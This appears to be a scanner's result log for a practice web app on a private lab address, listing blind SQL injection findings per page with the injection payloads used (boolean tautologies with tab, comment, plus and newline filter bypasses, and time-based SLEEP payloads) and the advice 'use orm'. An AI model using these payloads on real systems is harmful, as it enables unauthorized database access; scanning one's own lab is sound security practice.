Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'20414'='20414"}
payload: '	and	'20414'='20414
'	and	'94296'='94296
'	or	20494=20494#
'	and	'58626'='58627
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example2.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'20414'='20414"}
payload: '	and	'20414'='20414
'	and	'94296'='94296
'	or	20494=20494#
'	and	'58626'='58627
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example3.php 
VulnName: bsqli
Query: {'name': "root'/**/and/**/'69612'='69612"}
payload: '/**/and/**/'69612'='69612
'/**/and/**/'54574'='54574
'/**/or/**/46463=46463#
'/**/and/**/'68210'='68211
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example4.php 
VulnName: bsqli
Query: {'id': '2\tand\t81134=81134'}
payload: 	and	81134=81134
	and	18169=18169
	or	4896=4896#
	and	86906=86907
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example5.php 
VulnName: bsqli
Query: {'id': '2\tand\t81134=81134'}
payload: 	and	81134=81134
	and	18169=18169
	or	4896=4896#
	and	86906=86907
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example6.php 
VulnName: bsqli
Query: {'id': "2'+and+'72040'='72040"}
payload: '+and+'72040'='72040
'+and+'80652'='80652
'+or+27227=27227#
'+and+'40781'='40782
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example7.php 
VulnName: bsqli
Query: {'id': '2\nand\n88646=88646'}
payload: 
and
88646=88646

and
13621=13621

or
14956=14956#

and
3547=3548
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example8.php 
VulnName: bsqli
Query: {'order': 'name'}
payload: ` or SLEEP(3);-- 
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example9.php 
VulnName: bsqli
Query: {'order': 'name'}
payload:  or SLEEP(3);-- 
advice: use orm
---
---
URL:http://192.168.42.133/xml/example2.php 
VulnName: bsqli
Query: {'name': "hacker'+and+'72040'='72040"}
payload: '+and+'72040'='72040
'+and+'80652'='80652
'+or+27227=27227#
'+and+'40781'='40782
advice: use orm
---